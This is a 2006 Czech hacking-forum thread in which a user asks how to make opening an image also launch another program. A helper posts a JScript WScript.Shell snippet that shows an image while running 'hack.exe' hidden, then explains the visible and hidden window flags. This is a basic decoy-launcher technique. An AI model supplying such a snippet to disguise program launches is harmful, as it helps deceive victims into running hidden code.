Presměrování spuštění

HackForum

Presměrování spuštění#
No potreboval bych poradit:Kdyz zapnu jeden soubor
(treba jen obraze) tak aby se zaroven pustil i obraze i ten soubor napriklad psany ve VB

----------
[link]

[link]

Někdy kokot kokotem není, někdy je to prostě jenom pták.
(odpovědět)
qteck | E-mail | Website | ICQ 3642508692.7.2006 16:40
re: Presměrování spuštění#
Proste dva soubory najednou

----------
[link]

[link]

Někdy kokot kokotem není, někdy je to prostě jenom pták.
(odpovědět)
qteck | E-mail | Website | ICQ 3642508692.7.2006 16:41
re: Presměrování spuštění#
No newim jestli ti dobre rozumim ale mam pocit ze jsou naky programy na spajeni souboru ale link ti presne nedam ...
(odpovědět)
ChreNik - logout2.7.2006 16:57
re: Presměrování spuštění#
ChreNik:OK DIK JA SE KOUKNU ALE PISTE DAL LIDI NO VIM ZE SPOJOVAT SOUBORY SE DAJ VE WINCMD ALE POTREBUJU ABY ZUSTAL FURT TEN EFEKT KTEREJ TO MELO MIT

----------
[link]

[link]

Někdy kokot kokotem není, někdy je to prostě jenom pták.
(odpovědět)
qteck | E-mail | Website | ICQ 3642508692.7.2006 17:10
re: Presměrování spuštění#
Budeš to muset udělat pomocí krátkého scriptu, kterej obě akce spustí, ale neboj je to otázka pár řádků kódu.
V JScriptu např:
var WshShell = WScript.CreateObject ("WScript.Shell");
WshShell.Run (C:\image.jpg, 1, false);
WshShell.Run (C:\hack.exe, 0, false);

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP2.7.2006 18:02
re: Presměrování spuštění#
.cCuMiNn.:moc dik to je presne ono


----------
[link]

[link]

Někdy kokot kokotem není, někdy je to prostě jenom pták.
(odpovědět)
qteck | E-mail | Website | ICQ 3642508692.7.2006 18:22
re: Presměrování spuštění#
.cCuMiNn. :neslo by jeste nakopirovat to treba do obr.jpg a po kliknuti na tento soubor spustit oba

----------
[link]

[link]

Někdy kokot kokotem není, někdy je to prostě jenom pták.
(odpovědět)
qteck | E-mail | Website | ICQ 3642508692.7.2006 18:27
re: Presměrování spuštění#
No ulozil sem soubor jako lol.js
a zdrojak vypada takhle jak si napsal

var WshShell = WScript.CreateObject ("WScript.Shell");
WshShell.Run ("ll.txt, 1, false");
WshShell.Run ("film.jpg, 0, false");

ale pak mi to vyhodi chybu ze lol.js nebyl nalezen

----------
[link]

[link]

Někdy kokot kokotem není, někdy je to prostě jenom pták.
(odpovědět)
qteck | E-mail | Website | ICQ 3642508692.7.2006 18:43
re: Presměrování spuštění#
qteck: Správně bys to měl mít takhle:
var WshShell = WScript.CreateObject ("WScript.Shell");
WshShell.Run ("C:\\cesta\\ll.txt", 1, false);
WshShell.Run ("C:\\cesta\\film.jpg", 0, false);
(odpovědět)
.cCuMiNn,2.7.2006 20:53
re: Presměrování spuštění#
qteck: Jinak tam jak je jednicka, tak to se spusti viditelně a kde nula, tak to se spusti skryte.
Ke tve predchozi otazce - neslo, premyslej :)
(odpovědět)
.cCuMiNn,2.7.2006 20:55
re: Presměrování spuštění#
.cCuMiNn,:diky

----------
[link]

[link]

Někdy kokot kokotem není, někdy je to prostě jenom pták.
(odpovědět)
qteck | E-mail | Website | ICQ 3642508693.7.2006 12:15

Zpět
 
 
 

 
BBCode